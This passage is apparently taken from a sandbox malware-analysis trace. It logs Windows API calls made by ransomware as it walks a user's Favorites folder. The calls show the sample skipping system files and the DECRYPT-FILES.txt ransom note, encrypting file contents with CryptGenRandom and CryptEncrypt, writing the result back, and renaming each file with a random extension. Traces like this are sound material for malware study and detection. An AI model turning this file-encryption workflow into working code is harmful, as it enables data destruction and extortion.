returned="CreateThreadpoolWait" [0085.183] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.183] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.183] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.183] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.183] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.184] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.184] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.184] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.184] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.184] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.184] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.184] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.184] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.184] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.184] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.184] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.184] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.184] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.184] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.184] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.184] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.184] lstrlenA (lpString="DELETEATOM") returned 10 [0085.184] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.184] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.185] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.185] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.185] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.185] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.185] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.185] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.185] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.185] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.185] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.185] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.185] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.185] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.185] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.185] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.185] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.185] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.185] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.185] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.186] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.186] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.186] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.186] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.186] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.186] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.186] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.186] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.186] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.186] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.186] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.186] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.186] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.186] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.186] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.186] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.186] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.186] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.186] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.187] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.187] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.187] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.187] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.187] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.187] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.187] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 73 [0085.187] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.daOcq") returned 79 [0085.187] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.daOcq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.daocq"), dwFlags=0x0) returned 1 [0085.188] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.188] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.189] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.189] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef2db20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaef2db20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaef2db20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.189] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.189] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.189] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.189] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.189] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.189] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0085.189] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.189] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0085.189] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\jkbimi8.tmp" [0085.189] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.190] CloseHandle (hObject=0x0) returned 0 [0085.190] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.190] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0085.190] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.190] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="autorun.inf") returned 1 [0085.190] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="boot.ini") returned 1 [0085.190] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="desktop.ini") returned 1 [0085.190] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="ntuser.dat") returned 1 [0085.190] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="iconcache.db") returned 1 [0085.190] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="bootsect.bak") returned 1 [0085.190] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="ntuser.dat.log") returned 1 [0085.190] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="thumbs.db") returned 1 [0085.190] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Bootfont.bin") returned 1 [0085.190] lstrlenW (lpString="Windows Live Gallery.url") returned 24 [0085.190] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.190] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.190] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.191] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.191] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0085.191] lstrlenW (lpString="Windows Live Gallery.url") returned 24 [0085.191] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0085.191] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Windows Live Gallery.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" [0085.191] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.191] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.192] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.192] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.192] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.192] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.192] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.192] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.194] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.194] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.195] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.195] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.195] CloseHandle (hObject=0x42c) returned 1 [0085.195] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.195] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.196] CloseHandle (hObject=0x0) returned 0 [0085.196] CloseHandle (hObject=0x428) returned 1 [0085.196] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.196] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.197] GetTickCount () returned 0x114dc1d [0085.197] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.197] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.197] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.197] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.198] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 77 [0085.198] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.hTxRNP") returned 84 [0085.198] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.hTxRNP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.htxrnp"), dwFlags=0x0) returned 1 [0085.198] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.199] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.199] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.199] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0085.199] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.199] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="autorun.inf") returned 1 [0085.199] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="boot.ini") returned 1 [0085.199] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="desktop.ini") returned 1 [0085.199] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="ntuser.dat") returned 1 [0085.199] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="iconcache.db") returned 1 [0085.199] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="bootsect.bak") returned 1 [0085.199] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="ntuser.dat.log") returned 1 [0085.199] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="thumbs.db") returned 1 [0085.199] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Bootfont.bin") returned 1 [0085.199] lstrlenW (lpString="Windows Live Mail.url") returned 21 [0085.199] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.199] 